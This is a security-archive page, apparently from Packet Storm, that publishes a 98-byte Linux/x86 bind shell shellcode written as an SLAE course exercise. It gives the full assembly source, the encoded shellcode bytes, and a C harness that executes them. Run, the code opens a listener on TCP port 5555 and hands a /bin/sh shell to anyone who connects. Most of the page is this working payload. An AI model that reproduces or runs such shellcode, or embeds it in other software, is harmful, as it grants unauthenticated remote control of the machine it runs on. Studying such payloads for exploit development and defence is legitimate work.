what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 TCP/5555 Bindshell Shellcode

Linux/x86 TCP/5555 Bindshell Shellcode
Posted May 28, 2018
Authored by Luca Di Domenico

98 bytes small Linux/x86 TCP/5555 bindshell shellcode.

tags | x86, tcp, shellcode
systems | linux
SHA-256 | 2695862019edfec544f315d7be17d3f2bf86d2f43cc665a7c5133f3db8244852

Linux/x86 TCP/5555 Bindshell Shellcode

Change Mirror Download
#include<stdio.h>
#include<string.h>

/*

; Bind TCP Shellcode
; Copyright 2018, Luca Di Domenico
;
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see <http://www.gnu.org/licenses/>.

; Title: Linux/x86 - TCP bind shell
; Author: Luca Di Domenico
; Website: https://thehackeradventure.com
; Blog post: https://thehackeradventure.com/2018/05/17/assignement1/
; Twitter: @sudo45
; SLAE-ID: 1245

global _start

section .text
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx

; socket()

push eax
mov al, 0x66
mov bl, 0x1
mov cl, 0x2
push ebx
push ecx
lea ecx, [esp]
int 0x80

; bind()

pop ecx
pop ebx
push word 0xb315
push word cx
mov ecx, esp
mov dl, 0x10
push edx
push ecx
push eax
xchg eax, edx
mov al, 0x66
mov bl, 0x2
mov ecx, esp
int 0x80

; listen()

push eax
push edx
mov al, 0x66
mov bl, 0x4
mov ecx, esp
mov edx, eax
int 0x80

; accept()

xchg eax, edx
pop edi
push edx
push edi
inc ebx
mov ecx, esp
int 0x80
xchg ebx, eax
xor ecx, ecx
mov cl, 0x2

_dup2_loop:

mov al, 0x3f
int 0x80
dec ecx
jns _dup2_loop

; execve()

xor ecx, ecx
push ecx ; 0x00
push 0x68732f2f ; hs//
push 0x6e69622f ; nib/
mov ebx, esp
mov al, 0xb
int 0x80

*/

unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\xb0\x66\xb3\x01\xb1\x02\x53\x51\x8d\x0c\x24\xcd\x80\x59\x5b\x66\x68\x15\xb3\x66\x51\x89\xe1\xb2\x10\x52\x51\x50\x92\xb0\x66\xb3\x02\x89\xe1\xcd\x80\x50\x52\xb0\x66\xb3\x04\x89\xe1\x89\xc2\xcd\x80\x92\x5f\x52\x57\x43\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close